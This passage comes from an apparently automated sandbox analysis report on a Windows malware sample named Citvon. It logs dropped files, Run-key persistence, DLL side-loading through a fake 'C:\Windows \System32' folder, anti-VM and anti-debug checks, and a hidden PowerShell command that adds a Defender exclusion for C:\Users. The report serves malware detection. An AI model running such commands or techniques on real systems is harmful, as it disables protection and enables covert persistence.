        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Citvon\Citvon.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Citvon\Citvon.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Citvon\Citvon.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Citvon\Citvon.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Citvon\Citvon.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Citvon\Citvon.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Virustotal: Detection: 70%
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Metadefender: Detection: 35%
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | ReversingLabs: Detection: 65%
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File read: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: unknown | Process created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe 'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe'
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Process created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows \System32\Netplwiz.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Users\Public\Citvon\Citvon.exe 'C:\Users\Public\Citvon\Citvon.exe'
        Source: unknown | Process created: C:\Users\Public\Citvon\Citvon.exe 'C:\Users\Public\Citvon\Citvon.exe'
        Source: C:\Users\Public\Citvon\Citvon.exe | Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Users\Public\Citvon\Citvon.exe | Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Process created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows \System32\Netplwiz.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Users\Public\Citvon\Citvon.exe | Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Users\Public\Citvon\Citvon.exe | Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: msiexec.pdb source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
        Source: Binary string: msiexec.pdbGCTL source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
        Source: Binary string: netplwiz.pdb source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
        Source: Binary string: netplwiz.pdbGCTL source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
        Source: Binary string: wntdll.pdbUGP source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000003.00000002.698168920.0000000000B8F000.00000040.00000001.sdmp, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp

        Data Obfuscation:

        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Unpacked PE file: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Source: C:\Users\Public\Citvon\Citvon.exe | Unpacked PE file: 25.2.Citvon.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Source: C:\Users\Public\Citvon\Citvon.exe | Unpacked PE file: 27.2.Citvon.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: Citvon.exe.0.dr | Static PE information: real checksum: 0xb7705 should be: 0xb5507
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Static PE information: real checksum: 0xb7705 should be: 0xb5507
        Source: NETUTILS.dll.6.dr | Static PE information: section name: .xdata
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /4
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /19
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /31
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /45
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /57
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /70
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /81
        Source: NETUTILS.dll.6.dr | Static PE information: section name: /92
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_02288222 push 00405E24h; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_02288224 push 00405E24h; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_0228825C push 00405E5Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_022853E8 push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_0228871C push 0040631Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_0228840A push 0040600Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_0228840C push 0040600Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_02289B74 push ecx; mov dword ptr [esp], eax
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 0_3_02287F44 push 00405B69h; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_004100F9 push ss; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00416216 push edx; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0040C303 push edx; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0040C3CE push FFFFFF97h; iretd
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0041B3B5 push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0041B46C push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0041B402 push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0041B40B push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_004154F1 push ss; retf
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00415614 push ss; retf
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0040CFD2 push ss; retf
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_0040EF94 pushad ; iretd
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AED0D1 push ecx; ret
        Source: C:\Windows \System32\Netplwiz.exe | Code function: 8_2_613CF021 pushfq ; iretd
        Source: C:\Windows \System32\Netplwiz.exe | Code function: 8_2_613CFD00 pushfq ; ret
        Source: C:\Windows \System32\Netplwiz.exe | Code function: 8_2_613D0DFE push rsp; iretd
        Source: C:\Users\Public\Citvon\Citvon.exe | Code function: 17_3_022D53E8 push eax; ret
        Source: C:\Users\Public\Citvon\Citvon.exe | Code function: 17_3_022DA934 push eax; ret
        Source: C:\Users\Public\Citvon\Citvon.exe | Code function: 17_3_022D7F44 push 00405B69h; ret
        Source: C:\Users\Public\Citvon\Citvon.exe | Code function: 20_3_02208222 push 00405E24h; ret
        Source: C:\Users\Public\Citvon\Citvon.exe | Code function: 20_3_02208222 push 00405E24h; ret
        Source: C:\Users\Public\Citvon\Citvon.exe | Code function: 20_3_02208224 push 00405E24h; ret

        Persistence and Installation Behavior:

        Drops executables to the windows directory (C:\Windows) and starts them
        Source: C:\Windows\SysWOW64\cmd.exe | Executable created and started: C:\Windows \System32\Netplwiz.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File created: C:\Users\Public\Netplwiz.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File created: C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\NETUTILS.dll
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File created: C:\Users\Public\NETUTILS.dll
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File created: C:\Users\Public\Netplwiz.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File created: C:\Users\Public\NETUTILS.dll
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\NETUTILS.dll

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\Netplwiz.exeJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\NETUTILS.dllJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CitvonJump to behavior
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CitvonJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Citvon\Citvon.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\Citvon\Citvon.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\Citvon\Citvon.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 0000000000E585E4 second address: 0000000000E585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 0000000000E5896E second address: 0000000000E58974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\msiexec.exe RDTSC instruction interceptor: First address: 00000000003185E4 second address: 00000000003185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\msiexec.exe RDTSC instruction interceptor: First address: 000000000031896E second address: 0000000000318974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_004088A0 rdtsc
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4961
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3420
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864 Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: powershell.exe, 0000000D.00000003.705849674.00000172A814A000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Process queried: DebugPort
        Source: C:\Users\Public\Citvon\Citvon.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_004088A0 rdtsc
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows \System32\Netplwiz.exe Code function: 8_2_00007FF61AD317F0 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AD90AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AA28AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AA28AE mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A99080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A93880 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B13884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A958EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A940E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00ABB8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AA28FD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B518CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AAB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AC002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AC4020 mov edi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00ABA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B64015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B17016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A96800 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B61074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B52073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00ABF86D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B51843 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A95050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AB0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B151BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B549A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AB99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B169A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00ACA185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00ABC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A9519E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A9519E mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AC2990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AC4190 mov eax, dword ptr fs:[00000030h]
